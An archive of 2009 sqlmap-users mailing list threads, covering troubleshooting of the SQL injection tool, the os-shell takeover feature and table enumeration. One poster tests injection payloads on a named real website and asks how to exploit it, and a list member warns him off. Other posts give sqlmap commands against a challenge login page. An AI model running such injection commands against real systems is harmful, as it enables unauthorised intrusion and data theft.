>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>> >
>> ------------------------------------------------------------------------------
>> > Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
>> > is the only developer event you need to attend this year. Jumpstart your
>> > developing skills, take BlackBerry mobile applications to market and
>> > stay
>> > ahead of the curve. Join us from November 9&#45;12, 2009. Register
>> now&#33;
>> > http://p.sf.net/sfu/devconf
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>> ------------------------------------------------------------------------------
>> Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
>> is the only developer event you need to attend this year. Jumpstart your
>> developing skills, take BlackBerry mobile applications to market and stay
>> ahead of the curve. Join us from November 9&#45;12, 2009. Register
>> now&#33;
>> http://p.sf.net/sfu/devconf
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>

Re: [sqlmap-users] Basic injection not working... Help.

[Erik N. <da...@gm...>]

LOL!

On Thu, Sep 17, 2009 at 6:10 PM, Ryan Dewhurst <rya...@gm...> wrote:
> Busted!
>
> 2009/9/17 Patrick Webster <pa...@au...>:
>> It is probably not a good idea to attack http://www.siig.fr
>>
>> -Patrick
>>
>> On Fri, Sep 18, 2009 at 2:04 AM, Tristan Foureur <tri...@gm...>
>> wrote:
>>>
>>> Hello,
>>>
>>> I don't know why but a really really basic injection is not detected. The
>>> URL is like www.host.com?news_id=270&zone_id=4 and when I'm doing
>>>
>>> www.host.com?news_id=270&zone_id=4 OR 1 it displays every news, when I'm
>>> doing news_id=270 AND 0 it displays no news. When I'm doing news_id=270
>>> THISISATEST it displays a mysql error.
>>>
>>> So it's definitely injectable and that's not a "rare" type of injection.
>>>
>>> Now I would like to learn to use sqlmap to find these injections and how
>>> to use it but when I'm doing this :
>>>
>>> sqlmap.exe -u "http://www.siig.fr/fr/consnews2.php?news_id=270&zone_id=4"
>>> -v 1
>>>
>>> It says that both news_id and zone_id aren't injectables ! I tried using
>>> the -p parameter like that : -p zone_id but it doesn't change anything.
>>>
>>> I don't think that sqlmap can't detect such basic injections, so could you
>>> tell me what is the proper parameters to detect something simple like that,
>>> and then how to exploit it ?
>>>
>>> Thanks :)
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
>>> is the only developer event you need to attend this year. Jumpstart your
>>> developing skills, take BlackBerry mobile applications to market and stay
>>> ahead of the curve. Join us from November 9&#45;12, 2009. Register
>>> now&#33;
>>> http://p.sf.net/sfu/devconf
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>
>>
>> ------------------------------------------------------------------------------
>> Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
>> is the only developer event you need to attend this year. Jumpstart your
>> developing skills, take BlackBerry mobile applications to market and stay
>> ahead of the curve. Join us from November 9&#45;12, 2009. Register now&#33;
>> http://p.sf.net/sfu/devconf
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
> ------------------------------------------------------------------------------
> Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
> is the only developer event you need to attend this year. Jumpstart your
> developing skills, take BlackBerry mobile applications to market and stay
> ahead of the curve. Join us from November 9&#45;12, 2009. Register now&#33;
> http://p.sf.net/sfu/devconf
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

Re: [sqlmap-users] Basic injection not working... Help.

[Ryan D. <rya...@gm...>]

Busted!

2009/9/17 Patrick Webster <pa...@au...>:
> It is probably not a good idea to attack http://www.siig.fr
>
> -Patrick
>
> On Fri, Sep 18, 2009 at 2:04 AM, Tristan Foureur <tri...@gm...>
> wrote:
>>
>> Hello,
>>
>> I don't know why but a really really basic injection is not detected. The
>> URL is like www.host.com?news_id=270&zone_id=4 and when I'm doing
>>
>> www.host.com?news_id=270&zone_id=4 OR 1 it displays every news, when I'm
>> doing news_id=270 AND 0 it displays no news. When I'm doing news_id=270
>> THISISATEST it displays a mysql error.
>>
>> So it's definitely injectable and that's not a "rare" type of injection.
>>
>> Now I would like to learn to use sqlmap to find these injections and how
>> to use it but when I'm doing this :
>>
>> sqlmap.exe -u "http://www.siig.fr/fr/consnews2.php?news_id=270&zone_id=4"
>> -v 1
>>
>> It says that both news_id and zone_id aren't injectables ! I tried using
>> the -p parameter like that : -p zone_id but it doesn't change anything.
>>
>> I don't think that sqlmap can't detect such basic injections, so could you
>> tell me what is the proper parameters to detect something simple like that,
>> and then how to exploit it ?
>>
>> Thanks :)
>>
>>
>> ------------------------------------------------------------------------------
>> Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
>> is the only developer event you need to attend this year. Jumpstart your
>> developing skills, take BlackBerry mobile applications to market and stay
>> ahead of the curve. Join us from November 9&#45;12, 2009. Register
>> now&#33;
>> http://p.sf.net/sfu/devconf
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
> ------------------------------------------------------------------------------
> Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
> is the only developer event you need to attend this year. Jumpstart your
> developing skills, take BlackBerry mobile applications to market and stay
> ahead of the curve. Join us from November 9&#45;12, 2009. Register now&#33;
> http://p.sf.net/sfu/devconf
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

Re: [sqlmap-users] Basic injection not working... Help.

[Patrick W. <pa...@au...>]

It is probably not a good idea to attack http://www.siig.fr

-Patrick

On Fri, Sep 18, 2009 at 2:04 AM, Tristan Foureur
<tri...@gm...>wrote:

> Hello,
>
> I don't know why but a really really basic injection is not detected. The
> URL is like www.host.com?news_id=270&zone_id=4<http://www.host.com/?news_id=270&zone_id=4>and when I'm doing
>
> www.host.com?news_id=270&zone_id=4<http://www.host.com/?news_id=270&zone_id=4>OR 1 it displays every news, when I'm doing news_id=270 AND 0 it displays no
> news. When I'm doing news_id=270 THISISATEST it displays a mysql error.
>
> So it's definitely injectable and that's not a "rare" type of injection.
>
> Now I would like to learn to use sqlmap to find these injections and how to
> use it but when I'm doing this :
>
> sqlmap.exe -u "http://www.siig.fr/fr/consnews2.php?news_id=270&zone_id=4"
> -v 1
>
> It says that both news_id and zone_id aren't injectables ! I tried using
> the -p parameter like that : -p zone_id but it doesn't change anything.
>
> I don't think that sqlmap can't detect such basic injections, so could you
> tell me what is the proper parameters to detect something simple like that,
> and then how to exploit it ?
>
> Thanks :)
>
>
> ------------------------------------------------------------------------------
> Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
> is the only developer event you need to attend this year. Jumpstart your
> developing skills, take BlackBerry mobile applications to market and stay
> ahead of the curve. Join us from November 9&#45;12, 2009. Register now&#33;
> http://p.sf.net/sfu/devconf
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

Re: [sqlmap-users] Fwd: Fwd: sqlmap stop after testing User-Agent

[Adrien L. <lem...@gm...>]

your exemple was user and password. I've looked into tamper data and have
seen that variables were user and pass. So what do you think about it ?

Thank you a lot for your help, Erik !

On Wed, Sep 16, 2009 at 2:10 PM, Erik Nilsson <da...@gm...> wrote:

> This was just an example of variables to use. You have to identify the
> variables by your own for each url.
> A good tool for this is the "Tamper data" plug in for Firefox.
>
>
>
>
> ---------- Forwarded message ----------
> From: Adrien LEMAIRE <lem...@gm...>
> Date: Wed, Sep 16, 2009 at 1:52 PM
> Subject: Re: [sqlmap-users] Fwd: sqlmap stop after testing User-Agent
> To: Erik Nilsson <da...@gm...>
> Cc: sql...@li...
>
>
> Ok, I have already tried with --data option, but I've put
> "user=user;pass=pass" instead of "user=user&pass=pass", mistake.
>
> So I've retried and the output is :
>
> > $ python sqlmap.py -u
> http://invest.infomirmo.fr/webdesigner/connexion.php -v 1
> --data="user=user&pass=password"
> >
> >     sqlmap/0.7
> >     by Bernardo Damele A. G. <ber...@gm...>
> >
> > [*] starting at: 13:43:07
> >
> > [13:43:07] [INFO] testing connection to the target url
> > [13:43:07] [INFO] testing if the url is stable, wait a few seconds
> > [13:43:08] [INFO] url is stable
> > [13:43:08] [INFO] testing if POST parameter 'user' is dynamic
> > [13:43:08] [WARNING] POST parameter 'user' is not dynamic
> > [13:43:08] [INFO] testing if POST parameter 'pass' is dynamic
> > [13:43:08] [WARNING] POST parameter 'pass' is not dynamic
> > [13:43:08] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> > [13:43:08] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
> >
> > [*] shutting down at: 13:43:08
>
>
> So I suppose that there is no injection vulnerability, and I should
> use another tool ?
>
>
>
>
>
>
>
> On Wed, Sep 16, 2009 at 1:37 PM, Erik Nilsson <da...@gm...> wrote:
> >
> > You'll need to enter GET and/or POST values like
> >
> > sqlmap-0.7 $ python sqlmap.py -u
> > http://invest.infomirmo.fr/webdesigner/connexion.php -v 1
> > --data="user=user&password=password"
> >
> > OR
> >
> > sqlmap-0.7 $ python sqlmap.py
> > --url="
> http://invest.infomirmo.fr/webdesigner/connexion.php?user=user&data=data"
> >
> > ---------- Forwarded message ----------
> > From: Adrien LEMAIRE <lem...@gm...>
> > Date: Wed, Sep 16, 2009 at 11:35 AM
> > Subject: [sqlmap-users] sqlmap stop after testing User-Agent
> > To: sql...@li...
> >
> >
> > Hi everyone,
> >
> > I'm new to this list mail :)
> > I want to learn how to use sqlmap. I've installed sqlmap on my ubuntu,
> > and tried to launch it :
> >
> > >  sqlmap-0.7 $ python sqlmap.py -u
> http://invest.infomirmo.fr/webdesigner/connexion.php -v 1
> > >
> > >     sqlmap/0.7
> > >     by Bernardo Damele A. G. <ber...@gm...>
> > >
> > > [*] starting at: 11:13:17
> > >
> > > [11:13:17] [INFO] testing connection to the target url
> > > [11:13:17] [INFO] testing if the url is stable, wait a few seconds
> > > [11:13:19] [INFO] url is stable
> > > [11:13:19] [INFO] testing if User-Agent parameter 'User-Agent' is
> dynamic
> > > [11:13:19] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
> > >
> > > [*] shutting down at: 11:13:19
> >
> > This website is a french site for hacking challenges, and I wanted to
> > try if sqlmap couldn't bruteforce the login/password.
> > But I thought that sqlmap will also test for GET, POST and Cookie
> > before shutting down if nothing is dynamic.
> >
> > Reference to user manual :
> > >
> > > Let's say that you are auditing a web application and found a web page
> that accepts dynamic user-provided values on GET or POST parameters or HTTP
> Cookie values or HTTP User-Agent header value.
> >
> >
> > Did I misunderstood something ? Do you think I forgot to configure
> > something in sqlmap config files ? (I havn't modified any file yet).
> >
> > Thank you a lot for your answer, and sorry for disturb..
> > Best regards,
> > Adrien Lemaire
> >
> >
> ------------------------------------------------------------------------------
> > Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
> > is the only developer event you need to attend this year. Jumpstart your
> > developing skills, take BlackBerry mobile applications to market and stay
> > ahead of the curve. Join us from November 9&#45;12, 2009. Register
> now&#33;
> > http://p.sf.net/sfu/devconf
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
> >
> ------------------------------------------------------------------------------
> > Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
> > is the only developer event you need to attend this year. Jumpstart your
> > developing skills, take BlackBerry mobile applications to market and stay
> > ahead of the curve. Join us from November 9&#45;12, 2009. Register
> now&#33;
> > http://p.sf.net/sfu/devconf
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
> ------------------------------------------------------------------------------
> Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
> is the only developer event you need to attend this year. Jumpstart your
> developing skills, take BlackBerry mobile applications to market and stay
> ahead of the curve. Join us from November 9&#45;12, 2009. Register now&#33;
> http://p.sf.net/sfu/devconf
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

[sqlmap-users] Fwd: Fwd: sqlmap stop after testing User-Agent

[Erik N. <da...@gm...>]

This was just an example of variables to use. You have to identify the
variables by your own for each url.
A good tool for this is the "Tamper data" plug in for Firefox.




---------- Forwarded message ----------
From: Adrien LEMAIRE <lem...@gm...>
Date: Wed, Sep 16, 2009 at 1:52 PM
Subject: Re: [sqlmap-users] Fwd: sqlmap stop after testing User-Agent
To: Erik Nilsson <da...@gm...>
Cc: sql...@li...


Ok, I have already tried with --data option, but I've put
"user=user;pass=pass" instead of "user=user&pass=pass", mistake.

So I've retried and the output is :

> $ python sqlmap.py -u http://invest.infomirmo.fr/webdesigner/connexion.php -v 1 --data="user=user&pass=password"
>
>     sqlmap/0.7
>     by Bernardo Damele A. G. <ber...@gm...>
>
> [*] starting at: 13:43:07
>
> [13:43:07] [INFO] testing connection to the target url
> [13:43:07] [INFO] testing if the url is stable, wait a few seconds
> [13:43:08] [INFO] url is stable
> [13:43:08] [INFO] testing if POST parameter 'user' is dynamic
> [13:43:08] [WARNING] POST parameter 'user' is not dynamic
> [13:43:08] [INFO] testing if POST parameter 'pass' is dynamic
> [13:43:08] [WARNING] POST parameter 'pass' is not dynamic
> [13:43:08] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> [13:43:08] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
>
> [*] shutting down at: 13:43:08


So I suppose that there is no injection vulnerability, and I should
use another tool ?







On Wed, Sep 16, 2009 at 1:37 PM, Erik Nilsson <da...@gm...> wrote:
>
> You'll need to enter GET and/or POST values like
>
> sqlmap-0.7 $ python sqlmap.py -u
> http://invest.infomirmo.fr/webdesigner/connexion.php -v 1
> --data="user=user&password=password"
>
> OR
>
> sqlmap-0.7 $ python sqlmap.py
> --url="http://invest.infomirmo.fr/webdesigner/connexion.php?user=user&data=data"
>
> ---------- Forwarded message ----------
> From: Adrien LEMAIRE <lem...@gm...>
> Date: Wed, Sep 16, 2009 at 11:35 AM
> Subject: [sqlmap-users] sqlmap stop after testing User-Agent
> To: sql...@li...
>
>
> Hi everyone,
>
> I'm new to this list mail :)
> I want to learn how to use sqlmap. I've installed sqlmap on my ubuntu,
> and tried to launch it :
>
> >  sqlmap-0.7 $ python sqlmap.py -u http://invest.infomirmo.fr/webdesigner/connexion.php -v 1
> >
> >     sqlmap/0.7
> >     by Bernardo Damele A. G. <ber...@gm...>
> >
> > [*] starting at: 11:13:17
> >
> > [11:13:17] [INFO] testing connection to the target url
> > [11:13:17] [INFO] testing if the url is stable, wait a few seconds
> > [11:13:19] [INFO] url is stable
> > [11:13:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> > [11:13:19] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
> >
> > [*] shutting down at: 11:13:19
>
> This website is a french site for hacking challenges, and I wanted to
> try if sqlmap couldn't bruteforce the login/password.
> But I thought that sqlmap will also test for GET, POST and Cookie
> before shutting down if nothing is dynamic.
>
> Reference to user manual :
> >
> > Let's say that you are auditing a web application and found a web page that accepts dynamic user-provided values on GET or POST parameters or HTTP Cookie values or HTTP User-Agent header value.
>
>
> Did I misunderstood something ? Do you think I forgot to configure
> something in sqlmap config files ? (I havn't modified any file yet).
>
> Thank you a lot for your answer, and sorry for disturb..
> Best regards,
> Adrien Lemaire
>
> ------------------------------------------------------------------------------
> Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
> is the only developer event you need to attend this year. Jumpstart your
> developing skills, take BlackBerry mobile applications to market and stay
> ahead of the curve. Join us from November 9&#45;12, 2009. Register now&#33;
> http://p.sf.net/sfu/devconf
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
> ------------------------------------------------------------------------------
> Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
> is the only developer event you need to attend this year. Jumpstart your
> developing skills, take BlackBerry mobile applications to market and stay
> ahead of the curve. Join us from November 9&#45;12, 2009. Register now&#33;
> http://p.sf.net/sfu/devconf
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Re: [sqlmap-users] Fwd: sqlmap stop after testing User-Agent

[Adrien L. <lem...@gm...>]

Ok, I have already tried with --data option, but I've put
"user=user;pass=pass" instead of "user=user&pass=pass", mistake.

So I've retried and the output is :

$ python sqlmap.py -u
http://invest.infomirmo.fr/webdesigner/connexion.php-v 1
--data="user=user&pass=password"
>
>     sqlmap/0.7
>     by Bernardo Damele A. G. <ber...@gm...>
>
> [*] starting at: 13:43:07
>
> [13:43:07] [INFO] testing connection to the target url
> [13:43:07] [INFO] testing if the url is stable, wait a few seconds
> [13:43:08] [INFO] url is stable
> [13:43:08] [INFO] testing if POST parameter 'user' is dynamic
> [13:43:08] [WARNING] POST parameter 'user' is not dynamic
> [13:43:08] [INFO] testing if POST parameter 'pass' is dynamic
> [13:43:08] [WARNING] POST parameter 'pass' is not dynamic
> [13:43:08] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> [13:43:08] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
>
> [*] shutting down at: 13:43:08
>


So I suppose that there is no injection vulnerability, and I should use
another tool ?







On Wed, Sep 16, 2009 at 1:37 PM, Erik Nilsson <da...@gm...> wrote:

> You'll need to enter GET and/or POST values like
>
> sqlmap-0.7 $ python sqlmap.py -u
> http://invest.infomirmo.fr/webdesigner/connexion.php -v 1
> --data="user=user&password=password"
>
> OR
>
> sqlmap-0.7 $ python sqlmap.py
> --url="
> http://invest.infomirmo.fr/webdesigner/connexion.php?user=user&data=data"
>
> ---------- Forwarded message ----------
> From: Adrien LEMAIRE <lem...@gm...>
> Date: Wed, Sep 16, 2009 at 11:35 AM
> Subject: [sqlmap-users] sqlmap stop after testing User-Agent
> To: sql...@li...
>
>
> Hi everyone,
>
> I'm new to this list mail :)
> I want to learn how to use sqlmap. I've installed sqlmap on my ubuntu,
> and tried to launch it :
>
> >  sqlmap-0.7 $ python sqlmap.py -u
> http://invest.infomirmo.fr/webdesigner/connexion.php -v 1
> >
> >     sqlmap/0.7
> >     by Bernardo Damele A. G. <ber...@gm...>
> >
> > [*] starting at: 11:13:17
> >
> > [11:13:17] [INFO] testing connection to the target url
> > [11:13:17] [INFO] testing if the url is stable, wait a few seconds
> > [11:13:19] [INFO] url is stable
> > [11:13:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> > [11:13:19] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
> >
> > [*] shutting down at: 11:13:19
>
> This website is a french site for hacking challenges, and I wanted to
> try if sqlmap couldn't bruteforce the login/password.
> But I thought that sqlmap will also test for GET, POST and Cookie
> before shutting down if nothing is dynamic.
>
> Reference to user manual :
> >
> > Let's say that you are auditing a web application and found a web page
> that accepts dynamic user-provided values on GET or POST parameters or HTTP
> Cookie values or HTTP User-Agent header value.
>
>
> Did I misunderstood something ? Do you think I forgot to configure
> something in sqlmap config files ? (I havn't modified any file yet).
>
> Thank you a lot for your answer, and sorry for disturb..
> Best regards,
> Adrien Lemaire
>
>
> ------------------------------------------------------------------------------
> Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
> is the only developer event you need to attend this year. Jumpstart your
> developing skills, take BlackBerry mobile applications to market and stay
> ahead of the curve. Join us from November 9&#45;12, 2009. Register now&#33;
> http://p.sf.net/sfu/devconf
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
> ------------------------------------------------------------------------------
> Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
> is the only developer event you need to attend this year. Jumpstart your
> developing skills, take BlackBerry mobile applications to market and stay
> ahead of the curve. Join us from November 9&#45;12, 2009. Register now&#33;
> http://p.sf.net/sfu/devconf
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

[sqlmap-users] Fwd: sqlmap stop after testing User-Agent

[Erik N. <da...@gm...>]

You'll need to enter GET and/or POST values like

sqlmap-0.7 $ python sqlmap.py -u
http://invest.infomirmo.fr/webdesigner/connexion.php -v 1
--data="user=user&password=password"

OR

sqlmap-0.7 $ python sqlmap.py
--url="http://invest.infomirmo.fr/webdesigner/connexion.php?user=user&data=data"

---------- Forwarded message ----------
From: Adrien LEMAIRE <lem...@gm...>
Date: Wed, Sep 16, 2009 at 11:35 AM
Subject: [sqlmap-users] sqlmap stop after testing User-Agent
To: sql...@li...


Hi everyone,

I'm new to this list mail :)
I want to learn how to use sqlmap. I've installed sqlmap on my ubuntu,
and tried to launch it :

>  sqlmap-0.7 $ python sqlmap.py -u http://invest.infomirmo.fr/webdesigner/connexion.php -v 1
>
>     sqlmap/0.7
>     by Bernardo Damele A. G. <ber...@gm...>
>
> [*] starting at: 11:13:17
>
> [11:13:17] [INFO] testing connection to the target url
> [11:13:17] [INFO] testing if the url is stable, wait a few seconds
> [11:13:19] [INFO] url is stable
> [11:13:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> [11:13:19] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
>
> [*] shutting down at: 11:13:19

This website is a french site for hacking challenges, and I wanted to
try if sqlmap couldn't bruteforce the login/password.
But I thought that sqlmap will also test for GET, POST and Cookie
before shutting down if nothing is dynamic.

Reference to user manual :
>
> Let's say that you are auditing a web application and found a web page that accepts dynamic user-provided values on GET or POST parameters or HTTP Cookie values or HTTP User-Agent header value.


Did I misunderstood something ? Do you think I forgot to configure
something in sqlmap config files ? (I havn't modified any file yet).

Thank you a lot for your answer, and sorry for disturb..
Best regards,
Adrien Lemaire

------------------------------------------------------------------------------
Come build with us! The BlackBerry&reg; Developer Conference in SF, CA
is the only developer event you need to attend this year. Jumpstart your
developing skills, take BlackBerry mobile applications to market and stay
ahead of the curve. Join us from November 9&#45;12, 2009. Register now&#33;
http://p.sf.net/sfu/devconf
_______________________________________________
sqlmap-users mailing list
sql...@li...
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

[sqlmap-users] sqlmap stop after testing User-Agent

[Adrien L. <lem...@gm...>]

Hi everyone,

I'm new to this list mail :)
I want to learn how to use sqlmap. I've installed sqlmap on my ubuntu, and
tried to launch it :

 sqlmap-0.7 $ python sqlmap.py -u
> http://invest.infomirmo.fr/webdesigner/connexion.php -v 1
>
>     sqlmap/0.7
>     by Bernardo Damele A. G. <ber...@gm...>
>
> [*] starting at: 11:13:17
>
> [11:13:17] [INFO] testing connection to the target url
> [11:13:17] [INFO] testing if the url is stable, wait a few seconds
> [11:13:19] [INFO] url is stable
> [11:13:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> [11:13:19] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
>
> [*] shutting down at: 11:13:19
>

This website is a french site for hacking challenges, and I wanted to try if
sqlmap couldn't bruteforce the login/password.
But I thought that sqlmap will also test for GET, POST and Cookie before
shutting down if nothing is dynamic.

Reference to user manual :

> Let's say that you are auditing a web application and found a web page that
> accepts dynamic user-provided values on GET or POST parameters or HTTP
> Cookie values or HTTP User-Agent header value.
>


Did I misunderstood something ? Do you think I forgot to configure something
in sqlmap config files ? (I havn't modified any file yet).

Thank you a lot for your answer, and sorry for disturb..
Best regards,
Adrien Lemaire

Re: [sqlmap-users] Can you use sqlmap with mod_rewrite URLs?

[Bernardo D. A. G. <ber...@gm...>]

Hi Kyle,

On Mon, Sep 7, 2009 at 00:59, Kyle Anderson <ky...@xk...> wrote:
> ...
> Can anyone think of a way to use sqlmap in a situation with clean urls
> using mod_rewrite? (Which is very popular now-a-days)
>
> An example might be my mythtv web interface:
> http://192.168.1.1/mythweb/tv/detail/1004/1252278000
>
> Internally it is reading the module, chanid, and start time from the
> url. It is NOT possible to use something like
> index.php?chanid=104&time=1254...
>
> Is there any way to use sqlmap in this situation?

Not yet.
This enhancement will be implemented sometime.

Cheers,
-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

Re: [sqlmap-users] bugs

[Bernardo D. A. G. <ber...@gm...>]

Hi James,

On Thu, Aug 20, 2009 at 02:00,  <ja...@ev...> wrote:
> ...
> sqlmap version: 0.8-dev1
> Python version: 2.4.4
> Operating system: linux2
> Traceback (most recent call last):
>   File "./sqlhax", line 84, in main
>     start()
>   File "/nfs/sqlmap/lib/controller/controller.py", line 263,
> in start
>     action()
>   File "/nfs/sqlmap/lib/controller/action.py", line 140, in
> action
>     conf.dbmsHandler.osShell()
>   File "/nfs/sqlmap/plugins/generic/takeover.py", line 300,
> in osShell
>     self.initEnv()
>   File "/nfs/sqlmap/lib/takeover/abstraction.py", line 168,
> in initEnv
>     self.xpCmdshellInit(mandatory)
>   File "/nfs/sqlmap/lib/takeover/xp_cmdshell.py", line 181,
> in xpCmdshellInit
>     self.__xpCmdshellConfigure(1)
>   File "/nfs/sqlmap/lib/takeover/xp_cmdshell.py", line 106,
> in __xpCmdshellConfigure
>     if kb.dbmsVersion[0] in ( "2005", "2008" ):
> IndexError: list index out of range

This happens because for some reason, sqlmap was not able to identify
the version of MSSQL some lines before.
You can force the dbms version if you know it with the --dbms option.
Simply provide --dbms "mssql 200X".

> Also, for anyone on the list who is actually interested check out this
> cheat sheet, its pretty awesome.
>
> http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/

You can also have a look on my links on
http://delicious.com/inquis/sqlinjection.

Cheers,
-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

Re: [sqlmap-users] information_schema not avaible

[Bernardo D. A. G. <ber...@gm...>]

Hi ehmo,

On Sun, Aug 16, 2009 at 01:45, ehmo <dis...@gm...> wrote:
> Hey guys,
> i'm very curious about this thing.
>
> If back-end DB is MySQL < 5.0, SQLmap will always stop table lookup
> with this error.
> [ERROR] information_schema not available, back-end DBMS is MySQL < 5.0
>
> but this MySQL version doesn't have information_schema and i'm
> curious, why it will not to try guess all tables. Or exist any way in
> SQLmap how to get list of tables, if informatiom_schema is not
> avaible?

information_schema is not available by design in any MySQL < 5.0,
sqlmap is then not able to rely on it to enumerate information like
databases, table names, columns, etc.
sqlmap does not have an option to brute-force table names. Although,
you can provide database name (-D), table name (-T) and column name(s)
(-C) to use to dump entries from.

> Also, you should to add option for injecting referer, because
> sometimes is sqli there and sqlmpa doesn't know this method.

This will come in the long run.

Cheers,
-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F